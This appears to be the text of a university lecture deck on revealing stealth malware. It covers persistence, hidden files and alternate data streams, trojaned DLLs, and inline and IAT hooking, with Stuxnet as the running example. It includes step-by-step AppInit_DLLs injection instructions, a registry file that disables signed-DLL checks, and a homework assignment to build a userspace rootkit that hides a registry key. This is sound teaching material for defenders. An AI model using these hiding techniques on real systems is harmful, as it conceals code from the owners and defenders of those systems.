410 likes | 544 Views
Revealing Stealth Malware UMD CMSC389M. Xeno Kovah – Jan. 2013 xkovah at gmail Subject line starting with "UMD: ". All materials is licensed under a Creative Commons “ Share Alike ” license. http://creativecommons.org/licenses/by-sa/3.0/. Outline. Persistence
E N D
Revealing Stealth MalwareUMD CMSC389M Xeno Kovah – Jan. 2013 xkovah at gmail Subject line starting with "UMD:"
All materials is licensed under a Creative Commons “Share Alike” license. • http://creativecommons.org/licenses/by-sa/3.0/
Outline • Persistence • Type 1 – use system features • Hiding in plain sight • Hiding with filesystem attributes • Trojan DLL + forwarded exports • Type 2 – change things that shouldn't be changed • Inline hooks • A userspace OR kernel technique
Memory is impersistent • Malware executes in memory • Malware generally wants to stick around across reboots • So naturally it would like to persist on disk • But beyond just persisting, it needs to be invoked across reboots • Windows includes a number of registry locations where code can register that it would like to be executed at a particular time
Autoruns.exe • This tool examines an (AFAIK) exhaustive list of locations that code can register itself to either be automatically executed on system startup, or executed when some common process like IE is started.
Autoruns.exe • This tool examines an (AFAIK) exhaustive list of locations that code can register itself to either be automatically executed on system startup, or executed when some common process like IE is started.
Autoruns' Achilles' heel • Autoruns is not registry hiding aware. • That's part of why we're going to do homeworks designed around registry key hiding
Service Control Manager (SCM) • SCM is invoked as sc.exe, or it can be invoked programatically with APIs like CreateService() • In the development environment setup the load.bat uses sc.exe to register and load the HelloKernel.sys kernel driver as a service. • SCM can be used to register a kernel or userspace program to load on system boot or on demand. • A side-effect of using SCM is that it creates a registry entry in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services
Malware can also persist by infecting the binaries which are executed in the earliest stages of bootup. Examining these requires more specialized tools & knowledge From http://www.stoned-vienna.com/downloads/Presentation.pdf
Type 1 Stealth Malware: Use legitimate system features Hiding in plain sight
Hiding in Plain Sight • This means to make your software look like legitimate software, to a cursory examination • Somewhat related to trojans, though there need not necessarily be any sort of install-time subterfuge. More focused on if someone stumbles upon it later. • Strategies include naming your files like legitimate MS or 3rd party software,
Hiding in Plain Sight 2 • The key feature of such malware is that if you know where the malware is, you can see it with normal tools. • Because of that, we're not going to spend much time on them • They rely more on AV bypassing to stay on home systems, and lack of application whitelisting or even new application installation awareness to stay on enterprise systems.
Examples • Stuxnet named its drives mrxnet.sys and mrxcls.sys. There are legitimate Microsoft files named mrxsmb.sys and mrxdav.sys. • However, later versions were signed by stolen RealTek Semiconductor & JMicron Technology certificates, so those two aspects in some way run counter to each other • Zeus and other crimeware do not hide their files/registry keys (though they do often protect them)
Hiding with Filesystem Features • The "attrib +h" command on Windows can set the hidden file flag, which will make the file not visible if the user is running Explorer.exe with the default folder options.
Hiding with Filesystem Features 2 • Use "dir /AH" to see hidden files, and "dir /AS" to see system files. Or edit explorer's folder options as shown below. (On Windows 7 hit "alt" once to show the tools menu) Check Uncheck Uncheck
Hiding with Filesystem Features 2 • NTFS supports "Alternate Data Streams" (ADS) • An ADS can be created and opened with normal file access APIs, and will just have a name starting with a colon. E.g. if you have a file foo.txt you can just do "notepad foo.txt:bar" and you will be editing a new "bar" ADS associated with the foo.txt file
Hiding with Filesystem Features 3 • No built in way to see ADS on XP. Post-Vista they added a /r flag to dir command, but still no way to see in explorer.exe • On XP, LADS (http://www.heysoft.de/en/software/lads.php) is the way to go, though the good rootkit detectors will allow for viewing ADS too.
Misleading extension and/or icon • Windows will hide the ".exe", ".txt", ".jpg" extensions by default.
Stuxnet trojaned DLL • Stuxnet used forwarded exports for the 93 of 109 exports in s7otbxdx.dll which it didn't need to intercept. From http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_stuxnet_dossier.pdf
Stuxnet trojaned DLL 2 From http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_stuxnet_dossier.pdf
STEALTH MALWARE (will cut you!) Malware that hides by changing something that shouldn't legitimately change
A portrait of the rootkit as a young man in the middle (CC BY-NC-SA 2.0) image by thrill kills sunday pills http://www.flickr.com/photos/27086700@N03/2994587384/in/photostream/
Inline Hooked Intra-Module Function Call WickedSweetApp.exe … push 1234 call SomeFunc() add esp, 4 … … SomeFunc: mov edi, edi push ebp mov ebp, esp sub esp, 0x20 … ret 1 2
Inline Hooked Intra-Module Function Call WickedSweetApp.exe WickedWickedDll.dll … push 1234 call SomeFunc() add esp, 4 … … SomeFunc: jmp EvilFunc sub esp, 0x20 … ret EvilFunc: <stuff> … mov edi, edi push ebp mov ebp, esp jmp SomeFunc+5 1 2 4 3
Inline Hooked Intra-Module Function Call WickedSweetApp.exe WickedWickedDll.dll … push 1234 call SomeFunc() add esp, 4 … … SomeFunc: jmp EvilFunc sub esp, 0x20 … ret EvilFunc: <stuff> … mov edi, edi push ebp mov ebp, esp jmp SomeFunc+5 1 2 4 3
Hooking • We call the act of redirecting program execution "hooking" • Because you're hooking into the program to make it come to you
So what functions would an attacker want to hook? • Depends on what they're trying to hide, but the principle always is: Find whatever function shows that which you wish to hide, and hook it. • Well dang, I guess we're going to need to learn how programs view "stuff"
To the Googles! Or better yet
RTFMSDN! • FindFirstFile() - http://msdn.microsoft.com/en-us/library/windows/desktop/aa364418(v=vs.85).aspx • FindNextFile() - http://msdn.microsoft.com/en-us/library/windows/desktop/aa364428(v=vs.85).aspx • FindClose() - http://msdn.microsoft.com/en-us/library/windows/desktop/aa364413(v=vs.85).aspx
Everything you ever wanted to know about the X86-64 calling convention(but that OST Intro x86 didn't tell you) • Going to be in the updated version, "Intro x86-64" recorded in Feb • Argument 1 is in rcx • Argument 2 is in rdx • Argument 3 is in r8 • Argument 4 is in r9 • Any further arguments are on the stack • Return value is still in rax
WiiiiinDebugging, across the universe! • Windbg uses function name notation like "module!function" • I will set breakpoints on things like • kernel32!FindFirstFileExW, kernel32!FindFirstFileW, kernel32!FindFirstFileA, kernel32!FindNextFileW, kernel32!FindNextFileA • The W or A at the end means the "Wide" (unicode) or ASCII string version
Win 7 DLL Injection • See http://en.wikipedia.org/wiki/DLL_injection for more ways that this can be achieved on Windows/*nix • We're going to use the AppInit_DLLs way of doing this for simplicity • Note: AppInit_DLLs'behavior has changed in releases > XP, it now has to be enabled with Administrator level permissions. • Must set the DLL in question in the registry key: • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT \CurrentVersion\Windows\AppInit_DLLs • Use comma delimitation if there is an existing entry • Must also set the following key to 1 • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT \CurrentVersion\Windows\LoadAppInit_DLLs • Must also set the following key to 0 • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT \CurrentVersion\Windows\RequireSignedAppInit_DLLs
Example use of AppInit_DLLsfor XP DLL injection • http://www.codeproject.com/KB/vista/api-hooks.aspx • This will hook NtQuerySystemInformation(), which is what taskmgr.exe uses in order to list the currently running processes. It will replace this with HookedNtQuerySystemInformation(), which will hide calc.exe • I modified that code to use IAT hooking rather than inline (which is much simpler actually) • Steps: • Compile AppInitHookIAT.dll • Place at C:\tmp\AppInitHookIAT.dllfor simplicity • Use regedit.exe to add C:\tmp\AppInitHookIAT.dllas the value for the key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT \CurrentVersion\Windows\AppInit_DLLsand set the other values from the previous slide • Start calc.exe, start taskmgr.exe, confirm that calc.exedoesn't show up in the list of running processes. • Remove C:\tmp\AppInitHookIAT.dllfrom AppInit_DLLs and restart taskmgr.exe. • Confirm calc.exe shows up in the list of running processes. • (This is a basic "userspace rootkit" technique. Because of this, all entries in this registry key should always be looked upon with suspicion.)
Stuxnet use of inline hooks • From the Stuxnet Dossier: http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_stuxnet_dossier.pdf • "~WTR4141.tmp then loads ~WTR4132.tmp, but before doing so, it attempts to hide the files on the removable drive. Hiding the files on the removable drive as early in the infection process as possible is important for the threat since the rootkit functionality is not installed yet, as described in the Windows Rootkit Functionality section. Thus, ~WTR4141.tmp implements its own less-robust technique in the meantime. • WTR4141.tmp hooks the following APIs from kernel32.dll and Ntdll.dll: • From Kernel32.dll • FindFirstFileW • FindNextFileW • FindFirstFileExW • From Ntdll.dll • NtQueryDirectoryFile • ZwQueryDirectoryFile"
Homework 1 • Use AppInit_DLLs DLL injection with inline or IAT hooking to hide any registry key named "UMDRK" from Regedit.exe on Windows 7 64 bit. But in particular make sure you hide • HKLM\SYSTEM\CurrentControlSet\Services\UMDRK
High level HW1 steps • 1) Convert the module finding inline asm to C code (you're not allowed to use inline asm when it's 64 bit assembly with microsoft compilers). Start from the __readgsqword() intrinsic • 2) Figure out which Windows APIs are used to list registry entries & create fake versions that behave differently when they are trying to view the specified key • 3) Set up a MitM situation either through inline assembly manipulation, or through IAT entry changing • NOTE1: Your solution should cause the specified registry key to be hidden, but should *not* cause any subsequent registry keys to be hidden • NOTE2: Your solution should be generic, and not build in assumptions based on analyzing regedit (e.g. not just skipping directly to some offset to make some modification.) It must programmatically find the location(s) to change. You should probably test it against some other registry reading tools to make sure it is actually generic enough.
Helpful tools for HW1 • Win 7 x64 (VM recommended) • to test on • VisualStudio 2010 Express • to compile code • WinDbg x86-64 aka "amd64" • to look at structure definitions • PEView & CFF Explorer • to look at PE headers • Process Monitor • helpful for inferring what functions map to what registry actions that are done by regedit to read the key
Build as DLL FYI, the one change I made to the template projects, that you wouldn't have seen in the instructions for setting up the devenv, was to change the project to make a DLL, like so:
For easy install enter the following into a file named "install.reg" that you can double click(you will still need to make C:\tmp and copy your compiled file to C:\tmp before running this) Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows] "AppInit_DLLs"="C:\\tmp\\StudentAppInitHookIAT.dll" "LoadAppInit_DLLs"=dword:00000001 "RequireSignedAppInit_DLLs"=dword:00000000 OR Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows] "AppInit_DLLs"="C:\\tmp\\StudentAppInitHookInline.dll" "LoadAppInit_DLLs"=dword:00000001 "RequireSignedAppInit_DLLs"=dword:00000000
For easy uninstall enter the following into a file named "uninstall.reg"that you can double click(you will still need to make C:\tmp and copy your compiled file to C:\tmp before running this) Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows] "AppInit_DLLs"="" OR Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows] "AppInit_DLLs"=""